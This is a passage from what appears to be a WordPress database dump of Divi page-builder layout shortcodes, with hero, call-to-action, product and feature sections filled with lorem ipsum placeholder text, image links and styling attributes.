Suspendisse in libero risus, in massa.</p>\n</div>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#19 CTA\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" padding_top_2=\"4%\" padding_right_2=\"10%\" padding_bottom_2=\"4%\" padding_left_2=\"10%\" column_padding_mobile=\"on\" custom_padding=\"0px||0px|\" padding_2_last_edited=\"on|tablet\" padding_2_phone=\"10%|10%|0px|10%\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||100px|\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/04.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"440px\" text_font_size_last_edited=\"on|tablet\" text_font_size_phone=\"30\" text_font_size_tablet=\"36\"]\n\n<p>Powerful yet simple.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"28px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"450px\" text_line_height=\"1.5em\"]\n\n<p>Donec laoreet volutpat molestie. Praesent a tempus dictum nibh ac ullamcorper. Sed eu consequat nisi.Etiam est a feugiat dolor.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8%|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"14\" custom_margin_tablet=\"4%|||\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"8%|||\"]\n\n<p>LEARN MORE</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#21 CTA\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" custom_css_main_element=\"border-top: 1px solid ;\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/07.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" custom_margin=\"8%||0px|\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"100px||0px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>A whole new experience</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||38px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"60%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"36\" max_width_tablet=\"80%\" max_width_last_edited=\"on|phone\"]\n\n<p>Start building superb websites today with Divi.</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#202020\" button_bg_color=\"#ffffff\" button_border_width=\"0\" button_border_color=\"#ffffff\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#202020\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;\"]\n\n\n\n[/et_pb_button][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" max_width=\"90%\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"9%||0px|\" custom_margin_phone=\"14%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','#1 Landing page','','publish','closed','closed','','1-landing-page','','','2016-08-01 18:25:40','2016-08-01 16:25:40','',0,'https://companyregistration.online/et_pb_layout/1-landing-page/',0,'et_pb_layout','',0),(26792,1,'2016-08-02 00:08:42','2016-08-01 22:08:42','[et_pb_section admin_label=\"#2 Hero Section\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/08.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"9.5%||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"100px||0px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>Wireframe Kit Vol. 01</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"64\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||22px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"60%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"36\" max_width_tablet=\"80%\" max_width_last_edited=\"on|phone\"]\n\n<p>Grow your business.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"720px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"370px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_margin=\"43px|||\" custom_padding=\"||9.5%|\" custom_padding_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_padding_phone=\"10px||100px|\" custom_margin_phone=\"10px|||\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font=\"Roboto||||\" title_font_size=\"18\" title_text_color=\"#303030\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"14\" button_text_color=\"#ffffff\" button_bg_color=\"#ea1d63\" button_border_width=\"4\" button_border_color=\"#ea1d63\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto|||on|\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#ea1d63\" button_border_color_hover=\"#ea1d63\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_contact_button=\"height:60px;||margin-top:8px;\" custom_css_contact_fields=\"height:60px;||\" custom_css_main_element=\"width:100%;||\"]\n\n[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"][/et_pb_contact_field][et_pb_contact_field field_title=\"Email\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"][/et_pb_contact_field]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#7 Content\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"550px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Set your<br>\nDivi website apart.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>I’m a lorem ipsum paragraph. Phasellus ac magna non augue porttitor scelerisque ac id diam. Mauris elit velit, lobortis sed interdum at, vestibulum vitae libero.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"55px||20px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/09.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||125px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"||46px|\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/10.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\" custom_margin_phone=\"4.4%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"26px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"412px\" text_line_height=\"1.5em\"]\n\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus ac magna non augue porttitor scelerisque ac id diam.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/11.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"26px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"412px\" text_line_height=\"1.5em\"]\n\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus ac magna non augue porttitor scelerisque ac id diam.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/12.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"26px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"412px\" text_line_height=\"1.5em\"]\n\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus ac magna non augue porttitor scelerisque ac id diam.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#26 Products\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#e6e4df\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"47px|||\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"CAC9C5\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"CAC9C5\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Products</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"67px||47px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||12px|\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" custom_padding_tablet=\"37px||47px|\" background_color_1=\"#ffffff\" background_color_2=\"#ffffff\" background_color_3=\"#ffffff\" background_color_4=\"#ffffff\" custom_css_main_1=\" border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\" custom_css_main_2=\" border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\" custom_css_main_3=\" border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\" custom_css_main_4=\" border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/131.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Product one</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||20px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>$80</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/141.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Product two</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||20px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>$160</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/151.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Product three</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||20px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>$320</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/161.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Product four</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||20px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>$320</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"57px||127px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"10px||52px|\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" custom_padding_tablet=\"27px||127px|\" gutter_width=\"2\" background_color_1=\"rgba(255,255,255,0)\" background_color_2=\"#ffffff\" background_color_3=\"#ffffff\" background_color_4=\"#ffffff\" custom_css_main_2=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\" custom_css_main_3=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\" custom_css_main_4=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#ea1d63\" button_border_width=\"0\" button_border_color=\"#ea1d63\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#ea1d63\" button_border_color_hover=\"#ea1d63\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;\"]\n\n\n\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#11 Features\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" 